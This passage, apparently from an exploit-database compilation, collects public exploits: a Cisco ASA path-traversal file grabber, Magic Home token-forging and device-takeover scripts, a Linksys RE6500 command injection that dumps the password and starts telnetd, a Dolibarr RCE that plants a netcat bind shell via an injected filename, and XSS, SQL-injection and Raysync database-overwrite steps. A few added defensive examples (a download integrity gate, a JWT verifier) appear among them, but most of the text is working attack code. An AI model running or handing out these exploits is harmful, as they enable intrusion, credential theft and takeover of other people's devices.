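        build_exploit_buffer(shellcode, ropchain)
    except ValueError:
        return False
    return True


def layout(buf: bytes, ropchain_len: int) -> dict:
    """Offsets a debugger session would want when checking where each part landed."""
    return {
        "shellcode_start": 0,
        "filler_end": BUFFER_SIZE,
        "ropchain_start": BUFFER_SIZE,
        "ropchain_words": ropchain_len // 4,
        "total": len(buf),
    }
```

With the page's own sizes (193-byte shellcode, 68-byte chain) the function yields the 580-byte buffer the sample run prints; the same check applied to a new target's chain tells you before the first attempt whether a gadget address contains a space or tab.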
-
Internet Download Manager v6.41 Build 3 - Remote Code Execution (RCE)
# Exploit Title: Internet Download Manager v6.41 Build 3 - Remote Code Execution (RCE)
# Date: 15.11.2022
# Exploit Author: M. Akil Gündoğan
# Contact: https://twitter.com/akilgundogan
# Vendor Homepage: https://www.internetdownloadmanager.com/
# Software Link: https://mirror2.internetdownloadmanager.com/idman641build3.exe?v=lt&filename=idman641build3.exe
# Version: v.6.41 Build 3
# Tested on: Windows 10 Professional x64
# PoC Video: https://youtu.be/0djlanUbfY4

Vulnerability Description:
---------------------------------------
Some help files are missing from non-English versions of Internet Download Manager. Help files with the ".chm" extension for the language in use are downloaded from the internet, run, and displayed to the user. The download is done over plain HTTP, an insecure protocol. An attacker on the local network can intercept the traffic with a MITM attack and replace the ".chm" help file with a malicious ".chm" file. IDM runs ".chm" files automatically after downloading them, which lets the attacker execute code remotely. IDM also uses HTTP to check for and download updates, so the attacker can also serve a fake update as if a new version were available. Since we used the Turkish version of IDM, the target address in the MITM attack was "http://www.internetdownloadmanager.com/languages/tut_tr.chm".

Requirements:
---------------------------------------
The attacker and the victim must be on the same local network.
The victim's user account must have administrative privileges on the system. The attacker does not need administrator privileges.

Steps to reproduce:
---------------------------------------
1 - The attacker prepares a malicious CHM file; see "https://sevenlayers.com/index.php/316-malicious-chm".
2 - A MITM attack is carried out against the target using Ettercap or Bettercap.
3 - The domains "internetdownloadmanager.com" and "*.internetdownloadmanager.com" are redirected to the attacker machine with DNS spoofing.
4 - A web server is started on the attacker machine with a "languages" directory containing the malicious ".chm" file under the same name (tut_tr.chm, or the file for the language the victim is using).
5 - When the victim opens Internet Download Manager and clicks the "Tutorials" button, the download starts and the malicious ".chm" file runs automatically when it finishes.

Advisories:
---------------------------------------
Developers should stop using insecure HTTP in their update and download modules. In addition, downloaded files should not be run automatically; additional warning messages should be displayed to users.

Special thanks: p4rs, ratio, blackcode, zeyd.can and all friends.
---------------------------------------
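The fix the advisory asks for is a gate between "downloaded" and "opened": a TLS-only origin and an integrity check against a digest shipped with the client. The following is an added Python example of that gate, not IDM code and not the author's; the help-file bytes and the pinned digest are constructed here so it runs offline, and the response body is passed in as an argument instead of being fetched. Note that TLS only closes the DNS-spoofing step if certificate validation stays on; a client that accepts any certificate is back where it started.

```python
import hashlib
import hmac
from urllib.parse import urlparse

# Constructed stand-in for the help file body and its published digest; not a
# real IDM file and not a real IDM hash.
HELP_FILE_BYTES = b"ITSF" + b"\x03\x00\x00\x00" + b"constructed tut_tr.chm body"
PINNED_SHA256 = hashlib.sha256(HELP_FILE_BYTES).hexdigest()
HELP_FILE_URL = "https://www.internetdownloadmanager.com/languages/tut_tr.chm"


class DownloadRejected(Exception):
    pass


def check_origin(url: str) -> None:
    """Plain HTTP gives a MITM on the LAN a free hand over the body, which is the
    whole attack above; require TLS so the spoofed host cannot terminate it."""
    scheme = urlparse(url).scheme.lower()
    if scheme != "https":
        raise DownloadRejected(f"refusing non-TLS download scheme {scheme!r}")


def digest_matches(body: bytes, expected_hex: str) -> bool:
    # constant-time compare so a mismatch does not leak how many hex digits agreed
    return hmac.compare_digest(hashlib.sha256(body).hexdigest(), expected_hex)


def accept_help_file(url: str, body: bytes, expected_hex: str) -> bytes:
    """Hardened gate in front of 'download then open': TL origin plus a digest
    pinned in the client build. `body` stands in for the HTTP response so the
    example runs offline; only on success would the bytes reach the CHM viewer."""
    check_origin(url)
    if not digest_matches(body, expected_hex):
        raise DownloadRejected("digest mismatch: body was replaced in transit or upstream")
    return body


def would_open(url: str, body: bytes, expected_hex: str = PINNED_SHA256) -> bool:
    """True only when both checks pass; False for the MITM cases described above."""
    try:
        accept_help_file(url, body, expected_hex)
    except DownloadRejected:
        return False
    return True
```

The two checks are deliberately independent: the digest catches a swapped file even when the transport is trusted (a compromised mirror), and the scheme check refuses the channel on which the digest would be fetched insecurely in the first place.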
-
Cisco ASA 9.14.1.10 and FTD 6.6.0.1 - Path Traversal (2)
# Exploit Title: Cisco ASA 9.14.1.10 and FTD 6.6.0.1 - Path Traversal (2)
# Date: 12 Dec 2020
# Exploit Author: [email protected]
# Vendor Homepage: cisco.com
# Software Link: It's against Hardware, specifically ASA's and FTD's
# Version: ASAs (from version 9.6 to 9.14.1.10) and FTD's (versions 6.2.3 to 6.6.0.1)
# Tested on: exploit runs on Python3 on OSX and on Kali Linux against cisco ASA 9.14
# CVE : CVE-2020-3452
# Github : https://github.com/cygenta/CVE-2020-3452

import requests

# Written by freakyclown for @CygentaHQ
# Cisco ASA Path Traversal
# CVE-2020-3452
# Usage: CVE-2020-3452.py {target}
# Example: CVE-2020-3452.py 192.168.0.12
# Requires - Requests - pip3 install requests
#
# This tool takes advantage of the above cve and attempts to
# download files as listed below, it is suggested that you make
# a working folder for the outputfiles to avoid confusion if
# attacking mutliple ASA's

# set your target
target = input("Enter target IP/Url: ")


def grabstuff():
    for file in files:
        print("trying: ", file)
        # set request parameters
        params = (
            ('type', 'mst'),
            ('textdomain', '+CSCOE+/' + file),
            ('default-language', ''),
            ('lang', '../'),
        )
        # set the response to the result of the request, inputting in target and params and ignoring ssl cert problems
        response = requests.get('https://' + target + '/+CSCOT+/translation-table', params=params, verify=False)
        # write the file to the disk
        f = open(file, "w")
        f.write(response.text)
        f.close()


# this is a list of files available to download, more will be added in time
# if anyone has a list of ASA files, I'd be happy to add here
files = {
    "sess_update.html", "blank.html", "noportal.html", "portal_ce.html", "portal.html",
    "logon_custom.css", "svc.html", "logo.gif", "portal_inc.lua", "nostcaccess.html",
    "session.js", "portal.js", "portal_custom.css", "running.conf", "tlbrportal_forms.js",
    "logon_forms.js", "win.js", "portal.css", "lced.html", "pluginlib.js", "useralert.html",
    "ping.html", "app_index.html", "shshimdo_url", "session_password.html", "relayjar.html",
    "relayocx.html", "color_picker.js", "color_picker.html", "cedhelp.html", "cedmain.html",
    "cedlogon.html", "cedportal.html", "portal_elements.html", "commonspawn.js", "common.js",
    "appstart.js", "relaymonjar.html", "relaymonocx.html", "cedsave.html", "tunnel_linux.jnlp",
    "ask.html", "no_svc.html", "preview.html", "cedf.html", "ced.html", "logon_redirect.html",
    "logout.html", "tunnel_mac.jnlp", "gp-gip.html", "auth.html", "wrong_url.html", "logon.html",
}

# obvious thing is obvious, try the things and barf if fail
try:
    grabstuff()
except Exception as err:
    print("Something went wrong sorry")
    print(err)
-
Magic Home Pro 1.5.1 - Authentication Bypass
# Exploit Title: Magic Home Pro 1.5.1 - Authentication Bypass
# Google Dork: NA
# Date: 22 October 2020
# Exploit Author: Victor Hanna (Trustwave SpiderLabs)
# Author Github Page: https://9lyph.github.io/CVE-2020-27199/
# Vendor Homepage: http://www.zengge.com/appkzd
# Software Link: https://play.google.com/store/apps/details?id=com.zengge.wifi&hl=en
# Version: 1.5.1 (REQUIRED)
# Tested on: Android 10

## Enumeration ##

import requests
import json
import os
from colorama import init
from colorama import Fore, Back, Style
import re

'''
1. First Stage Authentication
2. Second Stage Enumerate
3. Third Stage Remote Execute
'''

global found_macaddresses
found_macaddresses = []
global outtahere
outtahere = ""
q = "q"
global token


def turnOn(target, token):
    urlOn = "https://wifij01us.magichue.net/app/sendCommandBatch/ZG001"
    array = {
        "dataCommandItems": [
            {"hexData": "71230fa3", "macAddress": target}
        ]
    }
    data = json.dumps(array)
    headersOn = {
        "User-Agent": "Magic Home/1.5.1(ANDROID,9,en-US)",
        "Accept-Language": "en-US",
        "Accept": "application/json",
        "Content-Type": "application/json; charset=utf-8",
        "token": token,
        "Host": "wifij01us.magichue.net",
        "Connection": "close",
        "Accept-Encoding": "gzip, deflate"
    }
    print(Fore.WHITE + "[+] Sending Payload ...")
    response = requests.post(urlOn, data=data, headers=headersOn)
    if response.status_code == 200:
        if "true" in response.text:
            print(Fore.GREEN + "[*] Endpoint " + Style.RESET_ALL + f"{target}" + Fore.GREEN + " Switched On")
        else:
            print(Fore.RED + "[-] Failed to switch on Endpoint " + Style.RESET_ALL + f"{target}")


def turnOff(target, token):
    urlOff = "https://wifij01us.magichue.net/app/sendCommandBatch/ZG001"
    array = {
        "dataCommandItems": [
            {"hexData": "71240fa4", "macAddress": target}
        ]
    }
    data = json.dumps(array)
    headersOff = {
        "User-Agent": "Magic Home/1.5.1(ANDROID,9,en-US)",
        "Accept-Language": "en-US",
        "Accept": "application/json",
        "Content-Type": "application/json; charset=utf-8",
        "token": token,
        "Host": "wifij01us.magichue.net",
        "Connection": "close",
        "Accept-Encoding": "gzip, deflate"
    }
    print(Fore.WHITE + "[+] Sending Payload ...")
    response = requests.post(urlOff, data=data, headers=headersOff)
    if response.status_code == 200:
        if "true" in response.text:
            print(Fore.GREEN + "[*] Endpoint " + Style.RESET_ALL + f"{target}" + Fore.GREEN + " Switched Off")
        else:
            print(Fore.RED + "[-] Failed to switch off Endpoint " + Style.RESET_ALL + f"{target}")


def lighItUp(target, token):
    outtahere = ""
    q = "q"
    if len(str(target)) < 12:
        print(Fore.RED + "[!] Invalid target" + Style.RESET_ALL)
    elif re.match('[0-9a-f]{2}[0-9a-f]{2}[0-9a-f]{2}[0-9a-f]{2}[0-9a-f]{2}[0-9a-f]{2}$', target.lower()):
        while outtahere.lower() != q.lower():
            if outtahere == "0":
                turnOn(target, token)
            elif outtahere == "1":
                turnOff(target, token)
            outtahere = input(Fore.BLUE + "ON/OFF/QUIT ? (0/1/Q): " + Style.RESET_ALL)


def Main():
    urlAuth = "https://wifij01us.magichue.net/app/login/ZG001"
    data = {
        "userID": "<Valid Registered Email/Username>",
        "password": "<Valid Registered Password>",
        "clientID": ""
    }
    headersAuth = {
        "User-Agent": "Magic Home/1.5.1(ANDROID,9,en-US)",
        "Accept-Language": "en-US",
        "Accept": "application/json",
        "Content-Type": "application/json; charset=utf-8",
        "Host": "wifij01us.magichue.net",
        "Connection": "close",
        "Accept-Encoding": "gzip, deflate"
    }

    # First Stage Authenticate
    os.system('clear')
    print(Fore.WHITE + "[+] Authenticating ...")
    response = requests.post(urlAuth, json=data, headers=headersAuth)
    resJsonAuth = response.json()
    token = (resJsonAuth['token'])

    # Second Stage Enumerate
    print(Fore.WHITE + "[+] Enumerating ...")
    macbase = "C82E475DCE"
    macaddress = []
    a = ["%02d" % x for x in range(100)]
    for num in a:
        macaddress.append(macbase + num)
    with open('loot.txt', 'w') as f:
        for mac in macaddress:
            urlEnum = "https://wifij01us.magichue.net/app/getBindedUserListByMacAddress/ZG001"
            params = {
                "macAddress": mac
            }
            headersEnum = {
                "User-Agent": "Magic Home/1.5.1(ANDROID,9,en-US)",
                "Accept-Language": "en-US",
                "Content-Type": "application/json; charset=utf-8",
                "Accept": "application/json",
                "token": token,
                "Host": "wifij01us.magichue.net",
                "Connection": "close",
                "Accept-Encoding": "gzip, deflate"
            }
            response = requests.get(urlEnum, params=params, headers=headersEnum)
            resJsonEnum = response.json()
            data = (resJsonEnum['data'])
            if not data:
                pass
            elif data:
                found_macaddresses.append(mac)
                print(Fore.GREEN + "[*] MAC Address Identified: " + Style.RESET_ALL + f"{mac}" + Fore.GREEN + f", User: " + Style.RESET_ALL + f"{(data[0]['userName'])}, " + Fore.GREEN + "Unique ID: " + Style.RESET_ALL + f"{data[0]['userUniID']}, " + Fore.GREEN + "Binded ID: " + Style.RESET_ALL + f"{data[0]['bindedUniID']}")
                f.write(Fore.GREEN + "[*] MAC Address Identified: " + Style.RESET_ALL + f"{mac}" + Fore.GREEN + f", User: " + Style.RESET_ALL + f"{(data[0]['userName'])}, " + Fore.GREEN + "Unique ID: " + Style.RESET_ALL + f"{data[0]['userUniID']}, " + Fore.GREEN + "Binded ID: " + Style.RESET_ALL + f"{data[0]['bindedUniID']}\n")
            else:
                print(Fore.RED + "[-] No results found!")
    print(Style.RESET_ALL)
    if not found_macaddresses:
        print(Fore.RED + "[-] No MAC addresses retrieved")
    elif found_macaddresses:
        attackboolean = input(Fore.BLUE + "Would you like to Light It Up ? (y/N): " + Style.RESET_ALL)
        if (attackboolean.upper() == 'Y'):
            target = input(Fore.RED + "Enter a target device mac address: " + Style.RESET_ALL)
            lighItUp(target, token)
        elif (attackboolean.upper() == 'N'):
            print(Fore.CYAN + "Sometimes, belief isn't about what we can see. It's about what we can't." + Style.RESET_ALL)
        else:
            print(Fore.CYAN + "The human eye is a wonderful device. With a little effort, it can fail to see even the most glaring injustice." + Style.RESET_ALL)


if __name__ == "__main__":
    Main()

## Token Forging ##

#!/usr/local/bin/python3
import url64  # PyPI package providing URL-safe base64 without padding
import requests
import json
import sys
import os
from colorama import init
from colorama import Fore, Back, Style
import re
import time
from wsgiref.handlers import format_date_time
from datetime import datetime
from time import mktime

now = datetime.now()
stamp = mktime(now.timetuple())

'''
HTTP/1.1 200
Server: nginx/1.10.3
Content-Type: application/json;charset=UTF-8
Connection: close

"{\"code\":0,\"msg\":\"\",\"data\":{\"webApi\":\"wifij01us.magichue.net/app\",\"webPathOta\":\"http:\/\/wifij01us.magichue.net\/app\/ota\/download\",\"tcpServerController\":\"TCP,8816,ra8816us02.magichue.net\",\"tcpServerBulb\":\"TCP,8815,ra8815us02.magichue.net\",\"tcpServerControllerOld\":\"TCP,8806,mhc8806us.magichue.net\",\"tcpServerBulbOld\":\"TCP,8805,mhb8805us.magichue.net\",\"sslMqttServer\":\"ssl:\/\/192.168.0.112:1883\",\"serverName\":\"Global\",\"serverCode\":\"US\",\"userName\":\"\",\"userEmail\":\"\",\"userUniID\":\"\"},\"token\":\"\"}"
'''


def Usage():
    print(f"Usage: {sys.argv[0]} <username> <unique id>")


def Main(user, uniqid):
    os.system('clear')
    print("[+] Encoding ...")
    print("[+] Bypass header created!")
    print("HTTP/1.1 200")
    print("Server: nginx/1.10.3")
    print("Date: " + str(format_date_time(stamp)) + "")
    print("Content-Type: application/json;charset=UTF-8")
    print("Connection: close\r\n\r\n")
    # Unsigned token: header claims alg "None" and the signature segment is left empty
    jwt_header = '{"typ": "JsonWebToken","alg": "None"}'
    jwt_data = '{"userID": "' + user + '", "uniID": "' + uniqid + '","cdpid": "ZG001","clientID": "","serverCode": "US","expireDate": 1618264850608,"refreshDate": 1613080850608,"loginDate": 1602712850608}'
    jwt_headerEncoded = url64.encode(jwt_header.strip())
    jwt_dataEncoded = url64.encode(jwt_data.strip())
    jwtcombined = (jwt_headerEncoded.strip() + "." + jwt_dataEncoded.strip() + ".")
    print("{\"code\":0,\"msg\":\"\",\"data\":{\"webApi\":\"wifij01us.magichue.net/app\",\"webPathOta\":\"http://wifij01us.magichue.net/app/ota/download\",\"tcpServerController\":\"TCP,8816,ra8816us02.magichue.net\",\"tcpServerBulb\":\"TCP,8815,ra8815us02.magichue.net\",\"tcpServerControllerOld\":\"TCP,8806,mhc8806us.magichue.net\",\"tcpServerBulbOld\":\"TCP,8805,mhb8805us.magichue.net\",\"sslMqttServer\":\"ssl:\/\/192.168.0.112:1883\",\"serverName\":\"Global\",\"serverCode\":\"US\",\"userName\":\"" + user + "\",\"userEmail\":\"" + user + "\",\"userUniID\":\"" + uniqid + "\"},\"token\":\"" + jwtcombined + "\"}")


if __name__ == "__main__":
    if len(sys.argv) < 3:
        Usage()
    else:
        Main(sys.argv[1], sys.argv[2])

## Device Takeover PoC ##

#!/usr/local/bin/python3
import url64
import requests
import json
import sys
import os
from colorama import init
from colorama import Fore, Back, Style
import re


def Usage():
    print(f"Usage: {sys.argv[0]} <attacker email> <target email> <target mac address> <target forged token>")


def Main():
    attacker_email = sys.argv[1]
    target_email = sys.argv[2]
    target_mac = sys.argv[3]
    forged_token = sys.argv[4]
    os.system('clear')
    print(Fore.WHITE + "[+] Sending Payload ...")
    # Share the victim's device with the attacker account using the forged token
    url = "https://wifij01us.magichue.net/app/shareDevice/ZG001"
    array = {"friendUserID": attacker_email, "macAddress": target_mac}
    data = json.dumps(array)
    headers = {
        "User-Agent": "Magic Home/1.5.1(ANDROID,9,en-US)",
        "Accept-Language": "en-US",
        "Accept": "application/json",
        "Content-Type": "application/json; charset=utf-8",
        "token": forged_token,
        "Host": "wifij01us.magichue.net",
        "Connection": "close",
        "Accept-Encoding": "gzip, deflate"
    }
    response = requests.post(url, data=data, headers=headers)
    if response.status_code == 200:
        if "true" in response.text:
            print(Fore.GREEN + "[*] Target is now yours ... " + Style.RESET_ALL)
        else:
            print(Fore.RED + "[-] Failed to take over target !" + Style.RESET_ALL)


if __name__ == "__main__":
    if len(sys.argv) < 5:
        Usage()
    else:
        Main()
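The Token Forging script works because the backend honours the `alg` value carried inside the token: a header of `"alg": "None"` with an empty third segment is accepted as a valid session for whatever `userID`/`uniID` the claims name, which is what the takeover script then spends against `shareDevice`. The following is an added Python example, not the author's code and not anything from the Magic Home service: it rebuilds the same forged token with the standard library, and next to it shows the verifier shape that defeats it, where the algorithm is fixed server-side and the signature is mandatory. The server key is a constructed stand-in.

```python
import base64
import hashlib
import hmac
import json
from typing import Optional

SERVER_KEY = b"constructed-server-hmac-key"  # stand-in; the real key is unknown


def b64url(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode("ascii")


def b64url_decode(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def decode_segment(segment: str) -> dict:
    return json.loads(b64url_decode(segment))


def forge_none_token(user_id: str, uni_id: str) -> str:
    """Same shape as the Token Forging script above: header advertises alg
    'None', claims name the victim, and the signature segment is empty."""
    header = {"typ": "JsonWebToken", "alg": "None"}
    claims = {"userID": user_id, "uniID": uni_id, "cdpid": "ZG001", "clientID": "",
              "serverCode": "US", "expireDate": 1618264850608,
              "refreshDate": 1613080850608, "loginDate": 1602712850608}
    compact = {"separators": (",", ":")}
    return (b64url(json.dumps(header, **compact).encode()) + "." +
            b64url(json.dumps(claims, **compact).encode()) + ".")


def sign_hs256(claims: dict, key: bytes) -> str:
    """What a correctly issued token looks like: HMAC-SHA256 over header.payload."""
    header = b64url(json.dumps({"typ": "JWT", "alg": "HS256"}, separators=(",", ":")).encode())
    payload = b64url(json.dumps(claims, separators=(",", ":")).encode())
    sig = hmac.new(key, f"{header}.{payload}".encode(), hashlib.sha256).digest()
    return f"{header}.{payload}.{b64url(sig)}"


def verify_hs256(token: str, key: bytes) -> Optional[dict]:
    """Hardened verifier: the algorithm is fixed by the server and never taken
    from the token, the signature must be present, and it is compared in
    constant time. Returns the claims, or None for any rejected token."""
    parts = token.split(".")
    if len(parts) != 3:
        return None
    header, payload, signature = parts
    try:
        if decode_segment(header).get("alg") != "HS256":  # 'None', 'none', 'NONE' all rejected
            return None
        expected = hmac.new(key, f"{header}.{payload}".encode(), hashlib.sha256).digest()
        if not signature or not hmac.compare_digest(b64url_decode(signature), expected):
            return None
        return decode_segment(payload)
    except ValueError:  # bad base64, bad UTF-8 or bad JSON in any segment
        return None
```

The important line is the `alg` comparison: a verifier that switches on the token's own header is what makes `None` (and its case variants) a bypass, so the accepted algorithm has to be a server-side constant, and an empty or absent signature has to fail before any claim is read.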
-
Grav CMS 1.6.30 Admin Plugin 1.9.18 - 'Page Title' Persistent Cross-Site Scripting
# Exploit Title: Grav CMS 1.6.30 Admin Plugin 1.9.18 - 'Page Title' Persistent Cross-Site Scripting
# Date: 13-12-2020
# Exploit Author: Sagar Banwa
# Vendor Homepage: https://getgrav.org/
# Software Link: https://getgrav.org/downloads
# Version: Grav v1.6.30 - Admin v1.9.18
# Tested on: Windows 10/Kali Linux
# Contact: https://www.linkedin.com/in/sagarbanwa/

Steps to reproduce:
1) Log in to the grav-admin panel.
2) Go to Pages.
3) Click on Add.
4) The "Add Page" dialog opens.
5) Fill in the details as below:
   Page Title    : <script>alert(1337)</script>
   Folder Name   : sagar_Banwa
   Parent Page   : /(root)
   Page Template : Default
   Visible       : yes
6) Click the Save button.
7) Click on Pages again.
8) Your page will be listed as <script>alert(1337)</script>.
9) Click the eye button to see the XSS fire, or simply go to http://127.0.0.1/grav-admin/ and the XSS will pop up.

-------------------------------------
POST /grav-admin/admin/pages HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 230
Origin: http://127.0.0.1
Connection: close
Referer: http://127.0.0.1/grav-admin/admin/pages
Cookie: grav-site-a4a23f1-admin=ehrcji8qpnu8e50r839r4oe2on; grav-site-a4a23f1=u5438b49fft2b5d7610a53ne1d; grav-tabs-state={%22tab-options.routes.registration.Security%22:%22data.Security%22%2C%22tab-content.options.advanced%22:%22data.content%22}
Upgrade-Insecure-Requests: 1

data%5Btitle%5D=%3Cscript%3Ealert%281337%29%3C%2Fscript%3E&data%5Bfolder%5D=sagar_banwa&data%5Broute%5D=%2F&data%5Bname%5D=default&data%5Bvisible%5D=1&data%5Bblueprint%5D=&task=continue&admin-nonce=d488c0d8bdaf2978d50f174942d5279f
-----------------------------
-
Raysync 3.3.3.8 - RCE
# Exploit Title: Raysync 3.3.3.8 - RCE
# Date: 04/10/2020
# Exploit Author: XiaoLong Zhu
# Vendor Homepage: www.raysync.io
# Version: below 3.3.3.8
# Tested on: Linux

step1: run RaysyncServer.sh to build a web application in the local environment and set the admin password to 123456, which will be written to the manage.db file.
step2: curl "[email protected]" http://[raysync ip]/avatar?account=1&UserId=/../../../../config/manager.db to overwrite the remote manage.db file on the server.
step3: log in to the admin portal with admin/123456.
step4: create a normal file with all permissions in scope.
step5: modify RaySyncServer.sh, adding an arbitrary evil command.
step6: trigger the RCE by clicking the "reset" button
-
PrestaShop ProductComments 4.2.0 - 'id_products' Time Based Blind SQL Injection
# Exploit Title: PrestaShop ProductComments 4.2.0 - 'id_products' Time Based Blind SQL Injection
# Date: 2020-12-15
# Exploit Author: Frederic ADAM
# Author contact: [email protected]
# Vendor Homepage: https://www.prestashop.com
# Software Link: https://github.com/PrestaShop/productcomments
# Version: 4.2.0
# Tested on: Debian 10
# CVE : CVE-2020-26248

http://localhost/index.php?fc=module&module=productcomments&controller=CommentGrade&id_products%5B%5D=[SQL]

Example:
http://localhost/index.php?fc=module&module=productcomments&controller=CommentGrade&id_products%5B%5D=(select*from(select(sleep(2)))a)
-
Seotoaster 3.2.0 - Stored XSS on Edit page properties
# Exploit Title: Seotoaster 3.2.0 - Stored XSS on Edit page properties
# Exploit Author: Hardik Solanki
# Vendor Homepage: https://www.seotoaster.com/
# Software Link: https://crm-marketing-automation-platforms.seotoaster.com/
# Version: 3.2.0
# Tested on: Windows 10

XSS ATTACK:
Cross-site Scripting (XSS) is a client-side code injection attack. The attacker aims to execute malicious scripts in the victim's web browser by including malicious code in a legitimate web page or web application. The actual attack occurs when the victim visits the web page or web application that executes the malicious code. The web page or web application becomes a vehicle to deliver the malicious script to the user's browser. Vulnerable vehicles that are commonly used for Cross-site Scripting attacks are forums, message boards, and web pages that allow comments.

XSS IMPACT:
1: Steal the cookie
2: User redirection to a malicious website

Vulnerable Parameters: Edit page properties

Steps to reproduce:
1: Navigate to "https://localhost/" and log in with valid credentials.
2: Then navigate to/click on "Edit page properties".
3: Add the payload "*"><script>alert(document.cookie)</script>*" in the "Page header H1 tag" field and click on the "Save Page" button. The page is saved successfully.
4: Hence the XSS will get stored and trigger on the home/main page.
-
Linksys RE6500 1.0.11.001 - Unauthenticated RCE
# Exploit Title: Linksys RE6500 1.0.11.001 - Unauthenticated RCE
# Date: 31/07/2020
# Exploit Author: RE-Solver
# Public disclosure: https://resolverblog.blogspot.com/2020/07/linksys-re6500-unauthenticated-rce-full.html#4
# Vendor Homepage: www.linksys.com
# Version: FW V1.05 up to FW v1.0.11.001
# Tested on: FW V1.05 up to FW v1.0.11.001
# Linksys RE6500 V1.0.05.003 and newer - Unauthenticated RCE
# Unsanitized user input in the web interface for Linksys WiFi extender RE6500 allows Unauthenticated remote command execution.
# An attacker can access system OS configurations and commands that are not intended for use beyond the web UI.

#!/usr/bin/env python
from requests import Session
import requests
import os

print("Linksys RE6500, RE6500 - Unsanitized user input allows Unauthenticated remote command execution.")
print("Tested on FW V1.05 up to FW v1.0.11.001")
print("RE-Solver @solver_re")

ip="192.168.1.226"

command="nvram_get Password >/tmp/lastpwd" #save device password;
post_data="admuser=admin&admpass=;"+command+";&admpasshint=61646D696E=&AuthTimeout=600&wirelessMgmt_http=1"
url_codeinjection="http://"+ip+"/goform/setSysAdm"
s = requests.Session()
s.headers.update({'Origin': "http://"+ip})
s.headers.update({'Referer': "http://"+ip+"/login.shtml"})
r= s.post(url_codeinjection, data=post_data)
if r.status_code == 200:
    print("[+] Prev password saved in /tmp/lastpwd")

command="busybox telnetd" #start telnetd;
post_data="admuser=admin&admpass=;"+command+";&admpasshint=61646D696E=&AuthTimeout=600&wirelessMgmt_http=1"
url_codeinjection="http://"+ip+"/goform/setSysAdm"
s = requests.Session()
s.headers.update({'Origin': "http://"+ip})
s.headers.update({'Referer': "http://"+ip+"/login.shtml"})
r=s.post(url_codeinjection, data=post_data)
if r.status_code == 200:
    print("[+] Telnet Enabled")

#set admin password
post_data="admuser=admin&admpass=0000074200016071000071120003627500015159&confirmadmpass=admin&admpasshint=61646D696E=&AuthTimeout=600&wirelessMgmt_http=1"
url_codeinjection="http://"+ip+"/goform/setSysAdm"
s = requests.Session()
s.headers.update({'Origin': "http://"+ip})
s.headers.update({'Referer': "http://"+ip+"/login.shtml"})
r=s.post(url_codeinjection, data=post_data)
if r.status_code == 200:
    print("[+] Prevent corrupting nvram - set a new password= admin")
-
Dolibarr ERP-CRM 12.0.3 - Remote Code Execution (Authenticated)
# Exploit Title: Dolibarr ERP-CRM 12.0.3 - Remote Code Execution (Authenticated)
# Date: 2020.12.17
# Exploit Author: Yilmaz Degirmenci
# Vendor Homepage: https://github.com/Dolibarr/dolibarr
# Software Link: https://sourceforge.net/projects/dolibarr/
# Version: 12.0.3
# Tested on: Kali Linux 2020.2
# Vulnerability Description: The open source ERP-CRM Dolibarr 12.0.3 is
# vulnerable to an authenticated Remote Code Execution attack. An attacker who
# has access to the admin dashboard can manipulate the backup function by
# inserting a payload into the zipfilename_template parameter on the page
# /admin/tools/dolibarr_export.php and clicking the "Generate Backup" button,
# thus triggering command injection on the target system.

import requests
from bs4 import BeautifulSoup
from bs4 import Comment
import re
import lxml
import json
import urllib

username = input("username: ")
password = input("password: ")
root_url = input("Root URL: http://192.168.0.15/ --> ")
print("Exploit is sent! Check out if the bind shell on port 9999 active!")

listener_port = "9999"
login_url = root_url + "/index.php?mainmenu=home "
vulnerable_url = root_url + "/admin/tools/dolibarr_export.php"
upload_url = root_url + "/admin/tools/export_files.php"

session = requests.Session()
request = session.get(login_url)

# Get the token value
soup = BeautifulSoup(request.text,"lxml")
token = soup.find("input",{'name':'token'})['value']

# Login
body = {"token":token, "actionlogin":"login", "loginfunction":"loginfunction", "tz":"-5", "tz_string":"America%2FNew_York", "dst_observed":"1", "dst_first":"2020-03-8T01%3A59%3A00Z", "dst_second": "2020-11-1T01%3A59%3A00Z", "screenwidth":"1668", "screenheight":"664", "dol_hide_topmenu":"", "dol_hide_leftmenu":"", "dol_optimize_smallscreen":"", "dol_no_mouse_hover":"", "dol_use_jmobile":"", "username":username,"password":password}
session.post(login_url, data=body, cookies=request.cookies)

request = session.get(vulnerable_url)
token = soup.find("input",{'name':'token'})['value']

header = {
    "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
    "User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0",
    "Accept":"*/",
    "Accept-Encoding": "gzip, deflate",
    "Origin": root_url,
    "Referer": root_url+"/admin/tools/dolibarr_export.php?mainmenu=home&leftmenu=admintools",
    "Upgrade-Insecure-Requests": "1"
}

body = {"token":token, "export_type":"server", "page_y":"1039", "zipfilename_template":"documents_dolibarr_12.0.3_202012160422.tar --use-compress-program='nc -c bash -nlvp 9999' %0a :: ", "compression":"gz"}
param = urllib.parse.urlencode(body, quote_via=urllib.parse.quote)
session.post(upload_url, data=body, params=param, cookies=request.cookies, headers=header)
-
Content Management System 1.0 - 'First Name' Stored XSS
# Exploit Title: Content Management System 1.0 - 'First Name' Stored XSS
# Exploit Author: Zhayi (Zeo)
# Date: 2020-12-14
# Vendor Homepage: https://www.sourcecodester.com/php/14625/content-management-system-using-phpmysqli-source-code.html
# Software Link: https://www.sourcecodester.com/download-code?nid=14625&title=Content+Management+System+using+PHP%2FMySQLi+with+Source+Code
# Affected Version: Version 1
# Tested on: WINDOWS 10

Step 1: Log in to the CMS with any valid user credentials.
Step 2: Click on the logged-in username in the header and select Manage Account.
Step 3: Rename the user's First Name to "<script>alert(document.domain)</script>".
Step 4: Update Profile; this will trigger the XSS.
Step 5: Log out and log in again, and the page will display the domain name.
-
Content Management System 1.0 - 'email' SQL Injection
# Exploit Title: Content Management System 1.0 - 'email' SQL Injection
# Exploit Author: Zhayi (Zeo)
# Date: 2020-12-14
# Vendor Homepage: https://www.sourcecodester.com/php/14625/content-management-system-using-phpmysqli-source-code.html
# Software Link: https://www.sourcecodester.com/download-code?nid=14625&title=Content+Management+System+using+PHP%2FMySQLi+with+Source+Code
# Affected Version: Version 1
